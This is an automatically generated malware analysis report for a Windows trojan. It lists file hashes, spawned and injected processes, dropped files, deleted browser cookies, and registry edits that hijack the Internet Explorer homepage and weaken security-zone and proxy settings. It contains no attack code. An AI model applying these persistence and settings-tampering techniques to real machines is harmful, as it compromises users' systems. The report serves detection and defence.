Gen.Variant.Graftor.94620_30ebd5248b – Adaware

HEUR:Trojan.Win32.Invader (Kaspersky), Gen:Variant.Graftor.94620 (AdAware), WormAutoItGen.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 30ebd5248bf939f8574924d0cd76a554

SHA1: 2a3cadbb1580d6e49fbc1486af7f7575ee902152

SHA256: 801921336350618643de072464dd29f0f46bf2ba49535cd2d7a806dda9070af2

SSDeep: 24576:/NBI/KyLqpALIYXjEAI8LDrrAJEWXR17lP3Dk:o9qpwIYTEs EUvlvg

Size: 1049992 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2013-12-01 10:08:23

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848

The Trojan injects its code into the following process(es):

MainProX.exe:600
Explorer.EXE:880

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process nvsvc32.exe:2604 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

The process MainPro.exe:604 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)

The process desk.exe:3840 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€šÃ‚Â»ÃƒÆ’Ã‚Â°Ãƒâ€šÃ‚Â±Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã¢â‚¬Å“ÃƒÆ’Ã…Â½ÃƒÆ’Ã‚ÂÃƒâ€šÃ‚Â·.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\ÃƒÆ’Ã¢â‚¬Â ÃƒÆ’Ã‚Â¥ÃƒÆ’Ã¢â‚¬Â¦ÃƒÆ’Ã¢â‚¬Â Ãƒâ€šÃ‚Â´ÃƒÆ’Ã‚Â³ÃƒÆ’Ã…â€™ÃƒÆ’Ã‚Â¼.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â ÃƒÆ’Ã‚Â¦Ãƒâ€šÃ‚Â°ÃƒÆ’Ã¢â‚¬ÂÃƒÆ’Ã¢â‚¬â„¢Ãƒâ€šÃ‚Âµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)

The process ndis500.exe:2464 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)

The Trojan deletes the following file(s):

%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)

The process YP.exe:1236 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)

The process ndsqp.exe:2428 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\drivers\uniconfi.dat (8 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (142 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (5 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)

The Trojan deletes the following file(s):

%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)

The process %original file name%.exe:1532 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)

The Trojan deletes the following file(s):

%WinDir%\jwxf\__tmp_rar_sfx_access_check_1215828 (0 bytes)

The process shock.exe:3848 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Ymb\sys32\shock.dll (931 bytes)

Registry activity

The process nvsvc32.exe:2604 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 88 7E 8E 2A B1 89 90 B7 C0 10 E6 23 84 4F E4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]

The process MainPro.exe:604 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 24 91 72 F9 3D AC 19 17 17 80 C6 18 67 0D C1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The Trojan deletes the following value(s) in system registry:

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroAvd"

The process desk.exe:3840 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnHTTPSToHTTPRedirect" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 01 C7 41 95 5F 3E 03 36 3C 0D 64 27 3F F0 C6"

[HKCR\DeskIcon]
"(Default)" = "1000_7959"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndis500.exe:2464 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A6 E3 93 65 77 35 D2 A6 8E A8 2A E5 06 0A C2"

The process ping.exe:496 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 82 14 14 8F 43 3B 31 DE 58 30 AF E3 CC B3 C0"

The process ping.exe:1388 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 9C 96 6D E4 F8 59 78 F8 EB 6F 6C E8 DE 81 11"

The process MainProX.exe:600 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 42 B8 19 EF A9 FA C9 A6 20 CC 25 93 DB D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://123.sogou.com/?71084-9278"

The process YP.exe:1236 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC E8 51 1F 1F 3F 45 A4 EF C9 06 73 8A B3 2A 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process ndsqp.exe:2428 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 54 F1 DA CF 13 32 D6 ED 49 8C E8 4F 5A 90 B6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]

The process %original file name%.exe:1532 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6A 4E 88 BE 58 91 12 29 00 09 17 5E BD C9 B7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\WinRAR SFX]
"c%%windows%jwxf" = "c:\windows\jwxf"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

